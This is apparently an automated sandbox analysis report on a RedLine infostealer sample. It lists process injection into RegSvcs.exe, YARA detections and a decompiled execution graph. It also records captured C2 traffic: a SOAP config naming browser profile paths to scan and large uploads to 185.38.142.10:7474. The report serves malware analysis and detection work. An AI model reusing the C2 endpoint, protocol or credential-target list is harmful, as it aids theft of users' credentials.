                  Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><EnvironmentSettingsResponse xmlns="http://tempuri.org/"><EnvironmentSettingsResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:BlockedCountry xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:BlockedIP xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:Object4>true</a:Object4><a:Object6>false</a:Object6><a:ScanBrowsers>true</a:ScanBrowsers><a:ScanChromeBrowsersPaths xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>%USERPROFILE%\AppData\Local\Battle.net</b:string><b:string>%USERPROFILE%\AppData\Local\Chromium\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google(x86)\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Roaming\Opera Software\</b:string><b:string>%USERPROFILE%\AppData\Local\MapleStudio\ChromePlus\User Data</b:string [TRUNCATED]


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  1192.168.2.449733185.38.142.1074741928C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                  TimestampBytes transferredDirectionData
                  Jun 28, 2024 08:58:01.929200888 CEST220OUTPOST / HTTP/1.1
                  Content-Type: text/xml; charset=utf-8
                  SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"
                  Host: 185.38.142.10:7474
                  Content-Length: 987505
                  Expect: 100-continue
                  Accept-Encoding: gzip, deflate
                  Jun 28, 2024 08:58:02.558567047 CEST25INHTTP/1.1 100 Continue
                  Jun 28, 2024 08:58:04.330425978 CEST294INHTTP/1.1 200 OK
                  Content-Length: 147
                  Content-Type: text/xml; charset=utf-8
                  Server: Microsoft-HTTPAPI/2.0
                  Date: Fri, 28 Jun 2024 06:58:04 GMT
                  Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                  Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironmentResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  2192.168.2.449734185.38.142.1074741928C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                  TimestampBytes transferredDirectionData
                  Jun 28, 2024 08:58:04.342310905 CEST240OUTPOST / HTTP/1.1
                  Content-Type: text/xml; charset=utf-8
                  SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
                  Host: 185.38.142.10:7474
                  Content-Length: 987497
                  Expect: 100-continue
                  Accept-Encoding: gzip, deflate
                  Connection: Keep-Alive
                  Jun 28, 2024 08:58:04.979604959 CEST25INHTTP/1.1 100 Continue
                  Jun 28, 2024 08:58:05.811933041 CEST408INHTTP/1.1 200 OK
                  Content-Length: 261
                  Content-Type: text/xml; charset=utf-8
                  Server: Microsoft-HTTPAPI/2.0
                  Date: Fri, 28 Jun 2024 06:58:05 GMT
                  Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 2f 3e 3c 2f 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                  Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>


                  Click to jump to process

                  Click to jump to process

                  Click to dive into process behavior distribution

                  Click to jump to process

                  Target ID:0
                  Start time:02:57:49
                  Start date:28/06/2024
                  Path:C:\Users\user\Desktop\b3u71vBG0u.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\b3u71vBG0u.exe"
                  Imagebase:0x740000
                  File size:1'072'128 bytes
                  MD5 hash:464709F3215D06F6703EB4ECB607AE7A
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1695088614.00000000023A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.1695088614.00000000023A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000000.00000002.1695088614.00000000023A0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                  • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000000.00000002.1695088614.00000000023A0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                  Reputation:low
                  Has exited:true

                  Target ID:1
                  Start time:02:57:50
                  Start date:28/06/2024
                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\b3u71vBG0u.exe"
                  Imagebase:0x820000
                  File size:45'984 bytes
                  MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.1832406933.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000001.00000002.1832406933.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000001.00000002.1832406933.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                  Reputation:high
                  Has exited:true

                  Target ID:2
                  Start time:02:57:50
                  Start date:28/06/2024
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff7699e0000
                  File size:862'208 bytes
                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Reset < >

                    Execution Graph

                    Execution Coverage:4.2%
                    Dynamic/Decrypted Code Coverage:0.4%
                    Signature Coverage:5.8%
                    Total number of Nodes:2000
                    Total number of Limit Nodes:170
                    execution_graph 97313 741055 97318 742649 97313->97318 97328 7477c7 97318->97328 97323 742754 97324 74105a 97323->97324 97336 743416 59 API calls 2 library calls 97323->97336 97325 762f80 97324->97325 97382 762e84 97325->97382 97327 741064 97337 760ff6 97328->97337 97330 7477e8 97331 760ff6 Mailbox 59 API calls 97330->97331 97332 7426b7 97331->97332 97333 743582 97332->97333 97375 7435b0 97333->97375 97336->97323 97339 760ffe 97337->97339 97340 761018 97339->97340 97342 76101c std::exception::exception 97339->97342 97347 76594c 97339->97347 97364 7635e1 DecodePointer 97339->97364 97340->97330 97365 7687db RaiseException 97342->97365 97344 761046 97366 768711 58 API calls _free 97344->97366 97346 761058 97346->97330 97348 7659c7 97347->97348 97353 765958 97347->97353 97373 7635e1 DecodePointer 97348->97373 97350 765963 97350->97353 97367 76a3ab 58 API calls __NMSG_WRITE 97350->97367 97368 76a408 58 API calls 7 library calls 97350->97368 97369 7632df GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 97350->97369 97351 7659cd 97374 768d68 58 API calls __getptd_noexit 97351->97374 97353->97350 97355 76598b RtlAllocateHeap 97353->97355 97358 7659b3 97353->97358 97362 7659b1 97353->97362 97370 7635e1 DecodePointer 97353->97370 97355->97353 97356 7659bf 97355->97356 97356->97339 97371 768d68 58 API calls __getptd_noexit 97358->97371 97372 768d68 58 API calls __getptd_noexit 97362->97372 97364->97339 97365->97344 97366->97346 97367->97350 97368->97350 97370->97353 97371->97362 97372->97356 97373->97351 97374->97356 97376 7435bd 97375->97376 97377 7435a1 97375->97377 97376->97377 97378 7435c4 RegOpenKeyExW 97376->97378 97377->97323 97378->97377 97379 7435de RegQueryValueExW 97378->97379 97380 743614 RegCloseKey 97379->97380 97381 7435ff 97379->97381 97380->97377 97381->97380 97383 762e90 _wprintf 97382->97383 97390 763457 97383->97390 97389 762eb7 _wprintf 97389->97327 97407 769e4b 97390->97407 97392 762e99 97393 762ec8 DecodePointer DecodePointer 97392->97393 97394 762ea5 97393->97394 97395 762ef5 97393->97395 97404 762ec2 97394->97404 97395->97394 97453 7689e4 59 API calls _wprintf 97395->97453 97397 762f58 EncodePointer EncodePointer 97397->97394 97398 762f07 97398->97397 97399 762f2c 97398->97399 97454 768aa4 61 API calls 2 library calls 97398->97454 97399->97394 97402 762f46 EncodePointer 97399->97402 97455 768aa4 61 API calls 2 library calls 97399->97455 97402->97397 97403 762f40 97403->97394 97403->97402 97456 763460 97404->97456 97408 769e6f EnterCriticalSection 97407->97408 97409 769e5c 97407->97409 97408->97392 97414 769ed3 97409->97414 97411 769e62 97411->97408 97438 7632f5 58 API calls 3 library calls 97411->97438 97415 769edf _wprintf 97414->97415 97416 769f00 97415->97416 97417 769ee8 97415->97417 97425 769f21 _wprintf 97416->97425 97442 768a5d 58 API calls 2 library calls 97416->97442 97439 76a3ab 58 API calls __NMSG_WRITE 97417->97439 97419 769eed 97440 76a408 58 API calls 7 library calls 97419->97440 97422 769f15 97423 769f1c 97422->97423 97424 769f2b 97422->97424 97443 768d68 58 API calls __getptd_noexit 97423->97443 97428 769e4b __lock 58 API calls 97424->97428 97425->97411 97426 769ef4 97441 7632df GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 97426->97441 97430 769f32 97428->97430 97432 769f57 97430->97432 97433 769f3f 97430->97433 97445 762f95 97432->97445 97444 76a06b InitializeCriticalSectionAndSpinCount 97433->97444 97436 769f4b 97451 769f73 LeaveCriticalSection _doexit 97436->97451 97439->97419 97440->97426 97442->97422 97443->97425 97444->97436 97446 762f9e RtlFreeHeap 97445->97446 97450 762fc7 _free 97445->97450 97447 762fb3 97446->97447 97446->97450 97452 768d68 58 API calls __getptd_noexit 97447->97452 97449 762fb9 GetLastError 97449->97450 97450->97436 97451->97425 97452->97449 97453->97398 97454->97399 97455->97403 97459 769fb5 LeaveCriticalSection 97456->97459 97458 762ec7 97458->97389 97459->97458 97460 741016 97465 744ad2 97460->97465 97463 762f80 __cinit 67 API calls 97464 741025 97463->97464 97466 760ff6 Mailbox 59 API calls 97465->97466 97467 744ada 97466->97467 97469 74101b 97467->97469 97472 744a94 97467->97472 97469->97463 97473 744a9d 97472->97473 97475 744aaf 97472->97475 97474 762f80 __cinit 67 API calls 97473->97474 97474->97475 97476 744afe 97475->97476 97477 7477c7 59 API calls 97476->97477 97478 744b16 GetVersionExW 97477->97478 97500 747d2c 97478->97500 97480 744b59 97491 744b86 97480->97491 97513 747e8c 97480->97513 97482 744b7a 97517 747886 97482->97517 97484 744bf1 GetCurrentProcess IsWow64Process 97485 744c0a 97484->97485 97487 744c20 97485->97487 97488 744c89 GetSystemInfo 97485->97488 97486 77dc8d 97509 744c95 97487->97509 97490 744c56 97488->97490 97490->97469 97491->97484 97491->97486 97493 744c32 97495 744c95 2 API calls 97493->97495 97494 744c7d GetSystemInfo 97496 744c47 97494->97496 97497 744c3a GetNativeSystemInfo 97495->97497 97496->97490 97498 744c4d FreeLibrary 97496->97498 97497->97496 97498->97490 97501 747da5 97500->97501 97502 747d38 __wsetenvp 97500->97502 97503 747e8c 59 API calls 97501->97503 97504 747d73 97502->97504 97505 747d4e 97502->97505 97508 747d56 _memmove 97503->97508 97525 748189 97504->97525 97521 748087 97505->97521 97508->97480 97510 744c2e 97509->97510 97511 744c9e LoadLibraryA 97509->97511 97510->97493 97510->97494 97511->97510 97512 744caf GetProcAddress 97511->97512 97512->97510 97514 747ea3 _memmove 97513->97514 97515 747e9a 97513->97515 97514->97482 97515->97514 97528 747faf 97515->97528 97518 747894 97517->97518 97519 747e8c 59 API calls 97518->97519 97520 7478a4 97519->97520 97520->97491 97522 748099 97521->97522 97523 74809f 97521->97523 97522->97508 97524 760ff6 Mailbox 59 API calls 97523->97524 97524->97522 97526 760ff6 Mailbox 59 API calls 97525->97526 97527 748193 97526->97527 97527->97508 97529 747fc2 97528->97529 97531 747fbf _memmove 97528->97531 97530 760ff6 Mailbox 59 API calls 97529->97530 97530->97531 97531->97514 97532 767e93 97533 767e9f _wprintf 97532->97533 97569 76a048 GetStartupInfoW 97533->97569 97535 767ea4 97571 768dbc GetProcessHeap 97535->97571 97537 767efc 97540 767f07 97537->97540 97654 767fe3 58 API calls 3 library calls 97537->97654 97572 769d26 97540->97572 97541 767f0d 97542 767f18 __RTC_Initialize 97541->97542 97655 767fe3 58 API calls 3 library calls 97541->97655 97593 76d812 97542->97593 97545 767f27 97546 767f33 GetCommandLineW 97545->97546 97656 767fe3 58 API calls 3 library calls 97545->97656 97612 775173 GetEnvironmentStringsW 97546->97612 97549 767f32 97549->97546 97552 767f4d 97553 767f58 97552->97553 97657 7632f5 58 API calls 3 library calls 97552->97657 97622 774fa8 97553->97622 97556 767f5e 97557 767f69 97556->97557 97658 7632f5 58 API calls 3 library calls 97556->97658 97636 76332f 97557->97636 97560 767f71 97561 767f7c __wwincmdln 97560->97561 97659 7632f5 58 API calls 3 library calls 97560->97659 97642 74492e 97561->97642 97564 767f90 97565 767f9f 97564->97565 97660 763598 58 API calls _doexit 97564->97660 97661 763320 58 API calls _doexit 97565->97661 97568 767fa4 _wprintf 97570 76a05e 97569->97570 97570->97535 97571->97537 97662 7633c7 36 API calls 2 library calls 97572->97662 97574 769d2b 97663 769f7c InitializeCriticalSectionAndSpinCount __ioinit 97574->97663 97576 769d30 97577 769d34 97576->97577 97665 769fca TlsAlloc 97576->97665 97664 769d9c 61 API calls 2 library calls 97577->97664 97580 769d39 97580->97541 97581 769d46 97581->97577 97582 769d51 97581->97582 97666 768a15 97582->97666 97585 769d93 97674 769d9c 61 API calls 2 library calls 97585->97674 97588 769d98 97588->97541 97589 769d72 97589->97585 97590 769d78 97589->97590 97673 769c73 58 API calls 4 library calls 97590->97673 97592 769d80 GetCurrentThreadId 97592->97541 97594 76d81e _wprintf 97593->97594 97595 769e4b __lock 58 API calls 97594->97595 97596 76d825 97595->97596 97597 768a15 __calloc_crt 58 API calls 97596->97597 97598 76d836 97597->97598 97599 76d8a1 GetStartupInfoW 97598->97599 97600 76d841 _wprintf @_EH4_CallFilterFunc@8 97598->97600 97606 76d8b6 97599->97606 97607 76d9e5 97599->97607 97600->97545 97601 76daad 97688 76dabd LeaveCriticalSection _doexit 97601->97688 97603 768a15 __calloc_crt 58 API calls 97603->97606 97604 76da32 GetStdHandle 97604->97607 97605 76da45 GetFileType 97605->97607 97606->97603 97606->97607 97608 76d904 97606->97608 97607->97601 97607->97604 97607->97605 97687 76a06b InitializeCriticalSectionAndSpinCount 97607->97687 97608->97607 97609 76d938 GetFileType 97608->97609 97686 76a06b InitializeCriticalSectionAndSpinCount 97608->97686 97609->97608 97613 775184 97612->97613 97614 767f43 97612->97614 97689 768a5d 58 API calls 2 library calls 97613->97689 97618 774d6b GetModuleFileNameW 97614->97618 97616 7751aa _memmove 97617 7751c0 FreeEnvironmentStringsW 97616->97617 97617->97614 97619 774d9f _wparse_cmdline 97618->97619 97621 774ddf _wparse_cmdline 97619->97621 97690 768a5d 58 API calls 2 library calls 97619->97690 97621->97552 97623 774fc1 __wsetenvp 97622->97623 97627 774fb9 97622->97627 97624 768a15 __calloc_crt 58 API calls 97623->97624 97632 774fea __wsetenvp 97624->97632 97625 775041 97626 762f95 _free 58 API calls 97625->97626 97626->97627 97627->97556 97628 768a15 __calloc_crt 58 API calls 97628->97632 97629 775066 97630 762f95 _free 58 API calls 97629->97630 97630->97627 97632->97625 97632->97627 97632->97628 97632->97629 97633 77507d 97632->97633 97691 774857 58 API calls _wprintf 97632->97691 97692 769006 IsProcessorFeaturePresent 97633->97692 97635 775089 97635->97556 97637 76333b __IsNonwritableInCurrentImage 97636->97637 97715 76a711 97637->97715 97639 763359 __initterm_e 97640 762f80 __cinit 67 API calls 97639->97640 97641 763378 __cinit __IsNonwritableInCurrentImage 97639->97641 97640->97641 97641->97560 97643 744948 97642->97643 97653 7449e7 97642->97653 97644 744982 IsThemeActive 97643->97644 97718 7635ac 97644->97718 97648 7449ae 97730 744a5b SystemParametersInfoW SystemParametersInfoW 97648->97730 97650 7449ba 97731 743b4c 97650->97731 97652 7449c2 SystemParametersInfoW 97652->97653 97653->97564 97654->97540 97655->97542 97656->97549 97660->97565 97661->97568 97662->97574 97663->97576 97664->97580 97665->97581 97669 768a1c 97666->97669 97668 768a57 97668->97585 97672 76a026 TlsSetValue 97668->97672 97669->97668 97670 768a3a 97669->97670 97675 775446 97669->97675 97670->97668 97670->97669 97683 76a372 Sleep 97670->97683 97672->97589 97673->97592 97674->97588 97676 775451 97675->97676 97682 77546c 97675->97682 97677 77545d 97676->97677 97676->97682 97684 768d68 58 API calls __getptd_noexit 97677->97684 97679 77547c HeapAlloc 97680 775462 97679->97680 97679->97682 97680->97669 97682->97679 97682->97680 97685 7635e1 DecodePointer 97682->97685 97683->97670 97684->97680 97685->97682 97686->97608 97687->97607 97688->97600 97689->97616 97690->97621 97691->97632 97693 769011 97692->97693 97698 768e99 97693->97698 97697 76902c 97697->97635 97700 768eb3 _memset ___raise_securityfailure 97698->97700 97699 768ed3 IsDebuggerPresent 97706 76a395 SetUnhandledExceptionFilter UnhandledExceptionFilter 97699->97706 97700->97699 97703 768f97 ___raise_securityfailure 97707 76c836 97703->97707 97704 768fba 97705 76a380 GetCurrentProcess TerminateProcess 97704->97705 97705->97697 97706->97703 97708 76c840 IsProcessorFeaturePresent 97707->97708 97709 76c83e 97707->97709 97711 775b5a 97708->97711 97709->97704 97714 775b09 5 API calls 2 library calls 97711->97714 97713 775c3d 97713->97704 97714->97713 97716 76a714 EncodePointer 97715->97716 97716->97716 97717 76a72e 97716->97717 97717->97639 97719 769e4b __lock 58 API calls 97718->97719 97720 7635b7 DecodePointer EncodePointer 97719->97720 97783 769fb5 LeaveCriticalSection 97720->97783 97722 7449a7 97723 763614 97722->97723 97724 763638 97723->97724 97725 76361e 97723->97725 97724->97648 97725->97724 97784 768d68 58 API calls __getptd_noexit 97725->97784 97727 763628 97785 768ff6 9 API calls _wprintf 97727->97785 97729 763633 97729->97648 97730->97650 97732 743b59 __ftell_nolock 97731->97732 97733 7477c7 59 API calls 97732->97733 97734 743b63 GetCurrentDirectoryW 97733->97734 97786 743778 97734->97786 97736 743b8c IsDebuggerPresent 97737 77d4ad MessageBoxA 97736->97737 97738 743b9a 97736->97738 97741 77d4c7 97737->97741 97739 743c73 97738->97739 97738->97741 97742 743bb7 97738->97742 97740 743c7a SetCurrentDirectoryW 97739->97740 97743 743c87 Mailbox 97740->97743 97996 747373 59 API calls Mailbox 97741->97996 97867 7473e5 97742->97867 97743->97652 97747 743bd5 GetFullPathNameW 97748 747d2c 59 API calls 97747->97748 97750 743c10 97748->97750 97749 77d4d7 97751 77d4ed SetCurrentDirectoryW 97749->97751 97883 750a8d 97750->97883 97751->97743 97754 743c2e 97755 743c38 97754->97755 97997 7a4c03 AllocateAndInitializeSid CheckTokenMembership FreeSid 97754->97997 97783->97722 97784->97727 97785->97729 97787 7477c7 59 API calls 97786->97787 97788 74378e 97787->97788 98025 743d43 97788->98025 97790 7437ac 97791 744864 61 API calls 97790->97791 97792 7437c0 97791->97792 97793 747f41 59 API calls 97792->97793 97794 7437cd 97793->97794 98039 744f3d 97794->98039 97797 77d3ae 98110 7a97e5 97797->98110 97798 7437ee Mailbox 98063 7481a7 97798->98063 97801 77d3cd 97804 762f95 _free 58 API calls 97801->97804 97806 77d3da 97804->97806 97808 744faa 84 API calls 97806->97808 97810 77d3e3 97808->97810 97814 743ee2 59 API calls 97810->97814 97811 747f41 59 API calls 97812 74381a 97811->97812 98070 748620 97812->98070 97816 77d3fe 97814->97816 97815 74382c Mailbox 97817 747f41 59 API calls 97815->97817 97818 743ee2 59 API calls 97816->97818 97819 743852 97817->97819 97820 77d41a 97818->97820 97821 748620 69 API calls 97819->97821 97822 744864 61 API calls 97820->97822 97824 743861 Mailbox 97821->97824 97823 77d43f 97822->97823 97825 743ee2 59 API calls 97823->97825 97827 7477c7 59 API calls 97824->97827 97826 77d44b 97825->97826 97828 7481a7 59 API calls 97826->97828 97829 74387f 97827->97829 97830 77d459 97828->97830 98074 743ee2 97829->98074 97832 743ee2 59 API calls 97830->97832 97835 77d468 97832->97835 97840 7481a7 59 API calls 97835->97840 97836 743899 97836->97810 97837 7438a3 97836->97837 97838 76313d _W_store_winword 60 API calls 97837->97838 97839 7438ae 97838->97839 97839->97816 97841 7438b8 97839->97841 97842 77d48a 97840->97842 97843 76313d _W_store_winword 60 API calls 97841->97843 97844 743ee2 59 API calls 97842->97844 97845 7438c3 97843->97845 97846 77d497 97844->97846 97845->97820 97847 7438cd 97845->97847 97846->97846 97848 76313d _W_store_winword 60 API calls 97847->97848 97849 7438d8 97848->97849 97849->97835 97850 743919 97849->97850 97852 743ee2 59 API calls 97849->97852 97850->97835 97851 743926 97850->97851 98090 74942e 97851->98090 97854 7438fc 97852->97854 97856 7481a7 59 API calls 97854->97856 97857 74390a 97856->97857 97859 743ee2 59 API calls 97857->97859 97859->97850 97862 7493ea 59 API calls 97864 743961 97862->97864 97863 749040 60 API calls 97863->97864 97864->97862 97864->97863 97865 743ee2 59 API calls 97864->97865 97866 7439a7 Mailbox 97864->97866 97865->97864 97866->97736 97868 7473f2 __ftell_nolock 97867->97868 97869 77ee4b _memset 97868->97869 97870 74740b 97868->97870 97872 77ee67 GetOpenFileNameW 97869->97872 98976 7448ae 97870->98976 97874 77eeb6 97872->97874 97876 747d2c 59 API calls 97874->97876 97878 77eecb 97876->97878 97878->97878 97880 747429 99004 7469ca 97880->99004 97884 750a9a __ftell_nolock 97883->97884 99321 746ee0 97884->99321 97886 750a9f 97887 743c26 97886->97887 99332 7512fe 89 API calls 97886->99332 97887->97749 97887->97754 97889 750aac 97889->97887 99333 754047 91 API calls Mailbox 97889->99333 97996->97749 98026 743d50 __ftell_nolock 98025->98026 98027 747d2c 59 API calls 98026->98027 98033 743eb6 Mailbox 98026->98033 98029 743d82 98027->98029 98036 743db8 Mailbox 98029->98036 98151 747b52 98029->98151 98030 747b52 59 API calls 98030->98036 98031 743e89 98032 747f41 59 API calls 98031->98032 98031->98033 98035 743eaa 98032->98035 98033->97790 98034 747f41 59 API calls 98034->98036 98037 743f84 59 API calls 98035->98037 98036->98030 98036->98031 98036->98033 98036->98034 98154 743f84 98036->98154 98037->98033 98160 744d13 98039->98160 98044 77dd0f 98047 744faa 84 API calls 98044->98047 98045 744f68 LoadLibraryExW 98170 744cc8 98045->98170 98048 77dd16 98047->98048 98050 744cc8 3 API calls 98048->98050 98052 77dd1e 98050->98052 98196 74506b 98052->98196 98053 744f8f 98053->98052 98054 744f9b 98053->98054 98056 744faa 84 API calls 98054->98056 98058 7437e6 98056->98058 98058->97797 98058->97798 98060 77dd45 98204 745027 98060->98204 98062 77dd52 98064 7481b2 98063->98064 98065 743801 98063->98065 98634 7480d7 59 API calls 2 library calls 98064->98634 98067 7493ea 98065->98067 98068 760ff6 Mailbox 59 API calls 98067->98068 98069 74380d 98068->98069 98069->97811 98071 74862b 98070->98071 98073 748652 98071->98073 98635 748b13 69 API calls Mailbox 98071->98635 98073->97815 98075 743f05 98074->98075 98076 743eec 98074->98076 98078 747d2c 59 API calls 98075->98078 98077 7481a7 59 API calls 98076->98077 98079 74388b 98077->98079 98078->98079 98080 76313d 98079->98080 98081 7631be 98080->98081 98082 763149 98080->98082 98638 7631d0 60 API calls 3 library calls 98081->98638 98088 76316e 98082->98088 98636 768d68 58 API calls __getptd_noexit 98082->98636 98085 7631cb 98085->97836 98086 763155 98637 768ff6 9 API calls _wprintf 98086->98637 98088->97836 98089 763160 98089->97836 98091 749436 98090->98091 98092 760ff6 Mailbox 59 API calls 98091->98092 98093 749444 98092->98093 98094 743936 98093->98094 98639 74935c 59 API calls Mailbox 98093->98639 98096 7491b0 98094->98096 98640 7492c0 98096->98640 98098 7491bf 98099 760ff6 Mailbox 59 API calls 98098->98099 98100 743944 98098->98100 98099->98100 98101 749040 98100->98101 98102 77f5a5 98101->98102 98103 749057 98101->98103 98102->98103 98650 748d3b 59 API calls Mailbox 98102->98650 98105 7491a0 98103->98105 98106 749158 98103->98106 98109 74915f 98103->98109 98649 749e9c 60 API calls Mailbox 98105->98649 98108 760ff6 Mailbox 59 API calls 98106->98108 98108->98109 98109->97864 98111 745045 85 API calls 98110->98111 98112 7a9854 98111->98112 98651 7a99be 98112->98651 98115 74506b 74 API calls 98116 7a9881 98115->98116 98117 74506b 74 API calls 98116->98117 98118 7a9891 98117->98118 98119 74506b 74 API calls 98118->98119 98120 7a98ac 98119->98120 98121 74506b 74 API calls 98120->98121 98122 7a98c7 98121->98122 98123 745045 85 API calls 98122->98123 98124 7a98de 98123->98124 98125 76594c __crtGetStringTypeA_stat 58 API calls 98124->98125 98126 7a98e5 98125->98126 98127 76594c __crtGetStringTypeA_stat 58 API calls 98126->98127 98128 7a98ef 98127->98128 98129 74506b 74 API calls 98128->98129 98130 7a9903 98129->98130 98131 7a9393 GetSystemTimeAsFileTime 98130->98131 98132 7a9916 98131->98132 98133 7a992b 98132->98133 98134 7a9940 98132->98134 98135 762f95 _free 58 API calls 98133->98135 98136 7a9946 98134->98136 98137 7a99a5 98134->98137 98139 7a9931 98135->98139 98657 7a8d90 98136->98657 98138 762f95 _free 58 API calls 98137->98138 98144 77d3c1 98138->98144 98141 762f95 _free 58 API calls 98139->98141 98141->98144 98143 762f95 _free 58 API calls 98143->98144 98144->97801 98145 744faa 98144->98145 98146 744fb4 98145->98146 98147 744fbb 98145->98147 98148 7655d6 __fcloseall 83 API calls 98146->98148 98149 744fca 98147->98149 98150 744fdb FreeLibrary 98147->98150 98148->98147 98149->97801 98150->98149 98152 747faf 59 API calls 98151->98152 98153 747b5d 98152->98153 98153->98029 98155 743f92 98154->98155 98159 743fb4 _memmove 98154->98159 98158 760ff6 Mailbox 59 API calls 98155->98158 98156 760ff6 Mailbox 59 API calls 98157 743fc8 98156->98157 98157->98036 98158->98159 98159->98156 98209 744d61 98160->98209 98163 744d61 2 API calls 98166 744d3a 98163->98166 98164 744d53 98167 76548b 98164->98167 98165 744d4a FreeLibrary 98165->98164 98166->98164 98166->98165 98213 7654a0 98167->98213 98169 744f5c 98169->98044 98169->98045 98371 744d94 98170->98371 98173 744ced 98174 744cff FreeLibrary 98173->98174 98175 744d08 98173->98175 98174->98175 98177 744dd0 98175->98177 98176 744d94 2 API calls 98176->98173 98178 760ff6 Mailbox 59 API calls 98177->98178 98179 744de5 98178->98179 98375 74538e 98179->98375 98181 744df1 _memmove 98182 744f21 98181->98182 98183 744ee9 98181->98183 98187 744e2c 98181->98187 98389 7a9ba5 95 API calls 98182->98389 98378 744fe9 CreateStreamOnHGlobal 98183->98378 98184 745027 69 API calls 98193 744e35 98184->98193 98187->98184 98188 74506b 74 API calls 98188->98193 98190 744ec9 98190->98053 98191 77dcd0 98192 745045 85 API calls 98191->98192 98194 77dce4 98192->98194 98193->98188 98193->98190 98193->98191 98384 745045 98193->98384 98195 74506b 74 API calls 98194->98195 98195->98190 98197 74507d 98196->98197 98199 77ddf6 98196->98199 98413 765812 98197->98413 98201 7a9393 98611 7a91e9 98201->98611 98203 7a93a9 98203->98060 98205 745036 98204->98205 98206 77ddb9 98204->98206 98616 765e90 98205->98616 98208 74503e 98208->98062 98210 744d2e 98209->98210 98211 744d6a LoadLibraryA 98209->98211 98210->98163 98210->98166 98211->98210 98212 744d7b GetProcAddress 98211->98212 